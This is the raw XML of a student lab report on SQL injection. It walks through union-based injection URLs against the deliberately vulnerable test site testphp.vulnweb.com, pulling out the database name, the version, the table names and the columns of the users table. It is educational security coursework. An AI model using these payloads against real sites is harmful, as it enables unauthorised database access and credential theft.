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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>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 xml:space="preserve">          EXPERIMENT-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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Student’s Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kanishk Soni</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ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UID: 20BCS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9398</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Section/Group: 707_WM_</w:t>
      </w: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ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Subject Code: 20CSP-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>38</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Subject Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WMS</w:t>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Lab</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ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Date of performance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/2022</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Branch: BE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSE</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ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Semester:5th</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Design methods to break authentication schemes (SQL Injection attack).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>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Objective:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Attack from command line(url).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w: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Software/Hardware Requirements:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 7 &amp; above version </w:t>
      </w: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Tools to be used:</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SQLMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction:</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"https://www.invicti.com/learn/sql-injection-sqli/"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SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> is a type of 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"https://www.acunetix.com/blog/articles/injection-attacks/"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injection attack</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pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="242" w:after="182" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>How and Why Is an SQL Injection Attack Performed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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z w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Attackers can use SQL Injections to find the credentials of other users in the database. They can then impersonate these users. The impersonated user may be a database administrator with all database privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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z w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>SQL lets you select and output data from the database. An SQL Injection vulnerability could allow the attacker to gain complete access to all data in a database server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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z w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>SQL also lets you alter data in a database and add new data. For example, in a financial application, an attacker could use SQL Injection to alter balances, void transactions, or transfer money to their account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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z w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>You can use SQL to delete records from a database, even drop tables. Even if the administrator makes database backups, deletion of data could affect application availability until the database is restored. Also, backups may not cover the most recent data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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z w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>In some database servers, you can access the operating system using the database server. This may be intentional or accidental. In such case, an attacker could use an SQL Injection as the initial vector and then attack the internal network behind a firewall.</w:t>
      </w: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Reading Material (add reference links along with material):</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"https://owasp.org/www-community/attacks/SQL_Injection"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https://owasp.org/www-community/attacks/SQL_Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Steps/Method/Coding:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"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000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Open given below targeted URL in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1"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Open the link-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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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Go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http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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You'll inject the malicious code (cheat code)-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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-1’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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Put the random number, cheat code -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http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by clause to check the row (tuple).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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Information gathering-</w:t>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To check the database name, Go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"http://testphp.vulnweb.com/listproducts.php?cat=-1%20union"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http://testphp.vulnweb.com/listproducts.php?cat=-1 union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,3,4,5,6,7,8,9,10,database()--</w:t>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 xml:space="preserve">To check the database version ,Go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"http://testphp.vulnweb.com/listproducts.php?cat=-1%20union"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http://testphp.vulnweb.com/listproducts.php?cat=-1 union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,2,3,4,5,6,7,8,9,10,version()—</w:t>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color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Information to be fetch-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Table name-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"http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Column name-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"http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273"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http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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Output screenshot:</w:t>
      </w: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4310380" cy="2826385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8" name="Picture 1" descr="C:\Users\HP\Documents\sqli\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HP\Documents\sqli\Capture.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4310380" cy="2826385"/>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4023360" cy="2921635"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="9" name="Picture 2" descr="C:\Users\HP\Documents\sqli\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P\Documents\sqli\Capture2.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4023360" cy="2921635"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>In the given screenshot you can see we have got an error message which means the running site is infected by SQL injection.</w:t>
      </w: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629025" cy="3119120"/>
            <wp:effectExtent l="0" t="0" r="13335" b="5080"/>
            <wp:docPr id="10" name="Picture 3" descr="C:\Users\HP\Documents\sqli\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HP\Documents\sqli\Capture3.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3629025" cy="3119120"/>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898900" cy="3311525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10795"/>
            <wp:docPr id="11" name="Picture 4" descr="C:\Users\HP\Documents\sqli\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Users\HP\Documents\sqli\Capture4.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3898900" cy="3311525"/>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738245" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="10795" b="4445"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\HP\Documents\sqli\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Documents\sqli\Capture5.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3738245" cy="3500755"/>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884930" cy="3209290"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="2" name="Picture 2" descr="C:\Users\HP\Documents\sqli\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ocuments\sqli\Capture6.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3884930" cy="3209290"/>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677920" cy="3178175"/>
            <wp:effectExtent l="0" t="0" r="10160" b="6985"/>
            <wp:docPr id="3" name="Picture 3" descr="C:\Users\HP\Documents\sqli\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Documents\sqli\Capture7.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3677920" cy="3178175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Maybe we can get some important data from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> table, so let’s penetrate more inside.  Again Use the concat function for table users for retrieving its entire column names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="187" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>We successfully retrieve all eight column names from inside the table users.</w:t>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eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3745230" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
